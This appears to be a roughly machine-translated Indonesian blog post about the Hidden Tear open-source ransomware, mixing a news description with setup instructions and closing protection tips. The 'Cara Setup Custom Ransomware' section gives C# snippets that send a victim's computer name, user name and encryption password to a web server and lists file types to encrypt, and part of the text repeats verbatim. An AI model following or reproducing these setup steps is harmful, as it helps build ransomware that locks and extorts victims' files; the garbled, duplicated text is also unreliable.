Ransomware adalah jenis Malware yang membatasi akses ke sistem komputer yang menginfeksi dalam beberapa cara, dan menuntut bahwa pengguna membayar Tebusan kepada operator malware untuk menghapus pembatasan.
Seorang peneliti keamanan Turki bernama utku Sen telah memposting kode Ransomware pada Github.
Hidden Tear menggunakan AES Enkripsi untuk mengunci file sebelum menampilkan pesan peringatan tebusan untuk mendapatkan bayaran dari pengguna.
Versi saat ini tidak terdeteksi dari ransomware dapat dimodifikasi dan diterapkan, karena mengandung semua fitur Cybercriminal yang dapat harapkan dari malware modern.
Sen menjelaskan Ransomware sebagai "sebuah ransomware seperti contoh file crypter yang dapat dimodifikasi untuk tujuan tertentu." Ini berarti bahkan script kiddies sekarang dapat mengembangkan Ransomware mereka sendiri untuk mengancam orang.
- Menggunakan algoritma AES untuk mengenkripsi file.
- Mengirimkan kunci enkripsi ke server.File terenkripsi dapat mendekripsi dalam program Decrypter dengan kunci enkripsi.
- Menciptakan sebuah file teks di Desktop dengan pesan yang diberikan.
Ukuran file kecil (12 KB). - Tidak terdeteksi program antivirus (15/08/2015) Result
Cara Setup Custom Ransomware
1. Anda harus memiliki server web yang mendukung bahasa scripting seperti PHP atau Python. Kemudian mengubah baris yang disebutkan di bawah dengan URL Anda. (Koneksi menggunakan HTTPS yang lebih baik untuk menghindari penyadapan):
String targetURL = "https://www.example.com/hidden-tear/write.php?info=";
2. Script harus menulis parameter GET ke file teks. Mengirim proses yang berjalan di SendPassword () fungsi:
string info = computerName + "-" + userName + " " + password;var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);
3. ekstensi file Target juga dapat diubah. Daftar default: validExtensions var = new [] {". txt", "doc", "docx", ".xls", ".xlsx", ".ppt", ".pptx", "odt", ".jpg "," .png "," .csv "," sql "," mdb "," SLN "," php "," Asp "," .aspx "," .html "," xml "," PSD "};
Cara Melindungi Diri dari ransomware Ancaman?
- Selalu menjaga backup rutin data penting Anda.
- Pastikan Anda menjalankan aktif anti-virus keamanan seperangkat alat pada sistem Anda.
- Jangan membuka lampiran email dari sumber yang tidak diketahui.
- Yang paling penting, selalu browsing internet dengan aman.
var conent = new System.Net.WebClient().DownloadString(fullUrl);
3. ekstensi file Target juga dapat diubah. Daftar default:
validExtensions var = new [] {". txt", "doc", "docx", ".xls", ".xlsx", ".ppt", ".pptx", "odt", ".jpg "," .png "," .csv "," sql "," mdb "," SLN "," php "," Asp "," .aspx "," .html "," xml "," PSD "};
Cara Melindungi Diri dari ransomware Ancaman?
- Selalu menjaga backup rutin data penting Anda.
- Pastikan Anda menjalankan aktif anti-virus keamanan seperangkat alat pada sistem Anda.
- Jangan membuka lampiran email dari sumber yang tidak diketahui.
- Yang paling penting, selalu browsing internet dengan aman.